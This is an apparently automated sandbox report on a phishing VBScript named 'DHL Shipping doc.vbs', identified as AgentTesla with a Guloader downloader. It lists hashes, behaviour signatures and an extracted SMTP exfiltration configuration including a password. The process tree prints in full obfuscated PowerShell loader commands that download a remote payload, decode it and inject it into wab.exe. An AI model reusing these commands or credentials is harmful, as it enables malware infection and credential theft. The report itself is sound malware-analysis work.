Analysis
-
max time kernel
151s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
24-04-2024 04:45
Static task
static1
Behavioral task
behavioral1
Sample
DHL Shipping doc.vbs
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
DHL Shipping doc.vbs
Resource
win10v2004-20240226-en
General
-
Target
DHL Shipping doc.vbs
-
Size
8KB
-
MD5
e483b9251c12c243495cc209ff1fa8e1
-
SHA1
3b1d7bdc1563c60ea44c9dd410018879fa1e392e
-
SHA256
ab7caea9be94fcd8bf2b3bb9a1da2fbc4af30134a190718ffd81cdb4cc9a3641
-
SHA512
c9d89fd7ddbe2ceaff82228c26a86c399fa1b4553398ac9ce4ec0dc4be80cb79ec90e6f4f8f0f6f2c72bc9e6cd8adc7335d2d19ae6200c6342879c01a31c7139
-
SSDEEP
192:UmydX+3iccHl8m3OtcUm+6/TAizc7OfG4:KuIl8m+GUcASfG4
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.cash4cars.nz - Port:
587 - Username:
[email protected] - Password:
logs2024! - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 12 2548 powershell.exe 14 2548 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 71 api.ipify.org 72 api.ipify.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 1264 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 4588 powershell.exe 1264 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 4588 set thread context of 1264 4588 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2548 powershell.exe 2548 powershell.exe 4588 powershell.exe 4588 powershell.exe 4588 powershell.exe 4588 powershell.exe 1264 wab.exe 1264 wab.exe 1264 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 4588 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeDebugPrivilege 1264 wab.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 1600 wrote to memory of 2548 1600 WScript.exe powershell.exe PID 1600 wrote to memory of 2548 1600 WScript.exe powershell.exe PID 2548 wrote to memory of 4004 2548 powershell.exe cmd.exe PID 2548 wrote to memory of 4004 2548 powershell.exe cmd.exe PID 2548 wrote to memory of 4588 2548 powershell.exe powershell.exe PID 2548 wrote to memory of 4588 2548 powershell.exe powershell.exe PID 2548 wrote to memory of 4588 2548 powershell.exe powershell.exe PID 4588 wrote to memory of 3912 4588 powershell.exe cmd.exe PID 4588 wrote to memory of 3912 4588 powershell.exe cmd.exe PID 4588 wrote to memory of 3912 4588 powershell.exe cmd.exe PID 4588 wrote to memory of 1264 4588 powershell.exe wab.exe PID 4588 wrote to memory of 1264 4588 powershell.exe wab.exe PID 4588 wrote to memory of 1264 4588 powershell.exe wab.exe PID 4588 wrote to memory of 1264 4588 powershell.exe wab.exe PID 4588 wrote to memory of 1264 4588 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL Shipping doc.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4 .all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn ');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean (Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga ');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2 rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while (!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens ' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum ') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey. SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,] Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk ');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4 Orga)Under ');Spelean $Patellula;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"3⤵PID:4004
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavegaOvarilHeadr:GraciAfuggin redstMarinrPedefoGliffpNi,eloAn.ermG otioAlkovr Pic.f Ud,siReklas BetjmAce,oeUnivenAdvok=Sl.ve$Sca hE Afmal IbizlFlestoLigulkRoistoBloodmDraaboAn,lytRef,oi Und.vMonum2.jemo4 .all2Bagdr.Immu.se ogrprejsnlLeg mi TalktCrino(Hush.$ An,iiKlimanzw ebtHandeeObserrblow.s,trgkeConvesNor esCro siTilsvoMilianpatriaFur,dlIti,e)opsmn ');$Ellokomotiv242=$Antropomorfismen[0];Spelean (Selvstarterens 'Samov$Unsa.gGroovlCabacoeart b MeanaCensolTr.al:AlkohP Int,r FugtaBacacePervrf ForkeFa,ilc Micrt,lostuOkkups Ungk=Haga.NHjrese,ktenwWadse-pearlOAccipb KalijcommoeundercU rivt Rest Pic,pSLig,ey D,ivsS,lutt ScleeEnchimUnd.f.kreplNTel.meJewe t Lods. FremW Nav eC,iefbfortoCAgglulF.skeiSnve,e lownnDkk.ntFo,st ');Spelean (Selvstarterens ' Mado$Term.PHj rnrUdeluaPhloreEtiotfKolloe Ma kc ,etat AflaunoncosOpfin.AnthoHF dtleSkrntaRettedLdrebeEctalrLophisBes s[Palme$ S ilY,rogreKredslLavsplMaskeo rintw,yocofFor,riNa,plsStranhBr.vt] thal= Morp$ForbiU Doglv Foroe HjbelSeec.k IngloEpanom.istinGr.veeValga ');$Alfilerilla=Selvstarterens 'InwrePTakserGrilna,ilare FlipfF,lthe UnthcEvo.et BubbuSkitss fagb.ServiDFluo,oDiamawbr.oknHomo lSewedo ,orta Zinkd A toFPehu iIngemlBeva eDoksa( inde$ Be.aEPreadlHvilkl Thirosal,ikStoleoPerism UnstoSkaaltGluttis.nglvOverf2 rntt4Eta,e2Havva, Ri,e$Nys,aLSadomoTri,akUnbacaLegarlBeskiofl.shsbrynjcTilloiH.acil Ammil .raua SrittTodkkofeedsr Bejd8Fritu6Paagr)Und r ';$Alfilerilla=$forecounsel[1]+$Alfilerilla;$Lokaloscillator86=$forecounsel[0];Spelean (Selvstarterens 'Raa.t$Expolg ApoilKochlo OmelbVeg,eaSdebaljuvel:EngelIFactun Lr naStrunkParaptFinnsi KlipvPreint,elec2Arb j5Udvi.5hydro=Logog(For dTSwordeP ikesL,kshtKilde-A,ostPDispeaCatentsikkehModne Urine$Glac,LDaityoStik,kAfsmiaAircrlSkn aoOver.sCannicPaleoiMeditlForbrl LogiaIn lutDismioUndogrKom,l8Hastv6montr)Retra ');while (!$Inaktivt255) {Spelean (Selvstarterens 'Thion$Lega,g .haslhverdoel,ktbEkspoaHngenlStemn:Sm.arK.erverOccasaUrnfinSejtrs Bat.s BlodtTosteiWaterlQ atrlTatoveSheatt Hand= u,ds$JivartElastr DestuFornie,nlgs ') ;Spelean $Alfilerilla;Spelean (Selvstarterens ' NonfSKompethaglba certrSubtetAbati-AlminSMidirlKartoeP,rioeKommapAjas. do,b4Hand. ');Spelean (Selvstarterens ' ini$CronigGoyadlAfmelosidebb TremaRegnelUnfig: MiniIMartrnV,yeuaH.stekTearltBilleiUri ovNon,ptPekes2Hemip5 att5Pa.om=Strep(StatfTYatageUnexpsTextutEjend-UntenP Jaz.aPosittkontihFrema Logo,$gyngeLBl.sto ranskTho.aa Her.ltursioSonebsInfamcBoghviTaffelAng sl StreaAfbudt,fteroDervir Unor8Patt,6Nonpo)Serum ') ;Spelean (Selvstarterens 'Latif$Delefg BlomlUdvikoK.empb .enga DoublVa,tl:Al.rmBkardiaHypopr papenN ctie FurnsMa.sekUm ddeTeks,fUnobnuUnpallbedemd,ounteNonac2 Epop8Englo= ,air$ Bagtg SupelGenetoFordubFunktaBagtalH dro:.ikkeLTortenTyngdt CasaaFranagskrmaeAsym rChoro+Chrom+Likvi%Progr$gymnaA SlannP,ttotwh.ner .atao Fla pupaatoU,dermBart oModenrAa saf RaahiOvolisHeathmAfdkkeTensonTimey. SkuecRenteo DrikuCircun OmdetShawl ') ;$Ellokomotiv242=$Antropomorfismen[$Barneskefulde28];}Spelean (Selvstarterens 'Uncom$Pyromg Fat,l nildoMinerbT,ansaUdskylNorm.:Fest S Bawde HornaD,ants Gedeh BusheFuldmlMartilYoginsRet.a1Stren Bille=Polym rapG Fl seSofavtMhto -,prngCTho noBydelnFinurt,ebreeRockanevangtAntil urali$RadilL Li io AlumkKeratadataslRaaklo B resTrinncUfo,siS.perlSedgylRen gaSorgltCompro UnivrB.lli8Sciss6Pupil ');Spelean (Selvstarterens ' Over$ HiergAgg,als.pieoRe labTekstaStjerlRe ns:SalutPUfuldrOpli,oPricecNedtrl ChyliRadi nTrunkeRende Breto=Rumsk Gipsp[Ge.etSTropeyClaspsSaanit ar eeBernym tdpu.TerroC fhugoBrsspn CanovDepoleBade rdokumtAfsk,] Man.:Firet:Bee rF reesrLibraoUnri.mSandkBE.pyea SacrsLflaseLsg.g6Mesod4Fed.kSOsmortPfef.rDetoniFilehnustadgSpejl(Stald$MesosS Metae prawaCo agsHomo,hdelpheCacoclKorjalTel.ps Dros1Hazar) Bedd ');Spelean (Selvstarterens 'Unrea$Paahogforb.lPityroU,bytb ChifaSadislmod,l:ClarnC TarmoM,almr cinun tapleForm.tDomnrtDo,er1 F,go4.rrep7Syste Presf=,dsla Sko,s[SprogS NoneyJailes Kompt ZealeS,gekmAnoma.FluidTArbe.eerhvexgymnatLrred.Ne riEinternIntercTrefao Y.nddBakteiStampn Sc lgUnder].inas:Pereg:WaggoAKildeSProtoCCo,nhI PresISkovs.Tu.soG AromeSubpetchau.S Luxet U sir.hasmimlke.n AnnegUdpo,(Afpri$pakslP WhinrJowino LindcMedicl JackiBlindnUnhareFalka)Vensk ');Spelean (Selvstarterens 'T age$ fletgFase.lRa,ghoFanc,bMultiaSemigl ict:PeepsPGafleaArbact ,pdee L njlSus.elOrdreuClithlStereaUnpro=Tegle$KukulCHolmgoC,ummr Af,enForfie Lacht Umbrt ty.i1Tr.mp4Foo.g7Korst.MarkisBa,tuu Shicbestras OdontTag tr Discitripen fromgSo de( uspi3 je l0Co,ro5Bygge1Faktu6Surmi4Pepto,Bor.e2Burro9nedsl0Klved5Helbr4 Orga)Under ');Spelean $Patellula;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aptychus.Whi && echo $"4⤵PID:3912
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4060 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:81⤵PID:4364
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zslh2hvj.nvn.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Aptychus.WhiFilesize
435KB
MD518a60c1da6907146eea018203acf5089
SHA101c5e653dba0eda7caba355feffa97726515247c
SHA2561f5670e65d8367057d1cdc75de0ca4b194cef53aee9311997b1d995ecf242b04
SHA5120eeca59fac3845807f2dd8d921f15808187f37fb945b51b568120036a46eaea7a076eeab0785e95d05b6e972d80e326a7baff5e87e68bba4621197d4e8670644
-
memory/1264-74-0x0000000001E60000-0x0000000004715000-memory.dmpFilesize
40.7MB
-
memory/1264-75-0x00000000228F0000-0x0000000022900000-memory.dmpFilesize
64KB
-
memory/1264-53-0x0000000001E60000-0x0000000004715000-memory.dmpFilesize
40.7MB
-
memory/1264-54-0x0000000077A08000-0x0000000077A09000-memory.dmpFilesize
4KB
-
memory/1264-85-0x00000000228F0000-0x0000000022900000-memory.dmpFilesize
64KB
-
memory/1264-84-0x0000000074F60000-0x0000000075710000-memory.dmpFilesize
7.7MB
-
memory/1264-81-0x0000000022C50000-0x0000000022C5A000-memory.dmpFilesize
40KB
-
memory/1264-80-0x0000000023340000-0x00000000233D2000-memory.dmpFilesize
584KB
-
memory/1264-79-0x0000000022C60000-0x0000000022CB0000-memory.dmpFilesize
320KB
-
memory/1264-55-0x0000000077981000-0x0000000077AA1000-memory.dmpFilesize
1.1MB
-
memory/1264-68-0x0000000000C00000-0x0000000001E54000-memory.dmpFilesize
18.3MB
-
memory/1264-71-0x0000000000C00000-0x0000000000C42000-memory.dmpFilesize
264KB
-
memory/1264-72-0x0000000074F60000-0x0000000075710000-memory.dmpFilesize
7.7MB
-
memory/2548-9-0x0000025D83540000-0x0000025D83562000-memory.dmpFilesize
136KB
-
memory/2548-32-0x00007FF9872D0000-0x00007FF987D91000-memory.dmpFilesize
10.8MB
-
memory/2548-36-0x0000025D9BAC0000-0x0000025D9BAD0000-memory.dmpFilesize
64KB
-
memory/2548-12-0x0000025D9BAC0000-0x0000025D9BAD0000-memory.dmpFilesize
64KB
-
memory/2548-10-0x00007FF9872D0000-0x00007FF987D91000-memory.dmpFilesize
10.8MB
-
memory/2548-78-0x00007FF9872D0000-0x00007FF987D91000-memory.dmpFilesize
10.8MB
-
memory/2548-13-0x0000025D9BAC0000-0x0000025D9BAD0000-memory.dmpFilesize
64KB
-
memory/2548-11-0x0000025D9BAC0000-0x0000025D9BAD0000-memory.dmpFilesize
64KB
-
memory/4588-22-0x00000000055C0000-0x0000000005626000-memory.dmpFilesize
408KB
-
memory/4588-38-0x00000000060F0000-0x000000000610A000-memory.dmpFilesize
104KB
-
memory/4588-44-0x0000000074F60000-0x0000000075710000-memory.dmpFilesize
7.7MB
-
memory/4588-45-0x0000000007130000-0x0000000007131000-memory.dmpFilesize
4KB
-
memory/4588-46-0x0000000008470000-0x000000000AD25000-memory.dmpFilesize
40.7MB
-
memory/4588-47-0x0000000008470000-0x000000000AD25000-memory.dmpFilesize
40.7MB
-
memory/4588-49-0x00000000047E0000-0x00000000047F0000-memory.dmpFilesize
64KB
-
memory/4588-50-0x00000000047E0000-0x00000000047F0000-memory.dmpFilesize
64KB
-
memory/4588-51-0x0000000008470000-0x000000000AD25000-memory.dmpFilesize
40.7MB
-
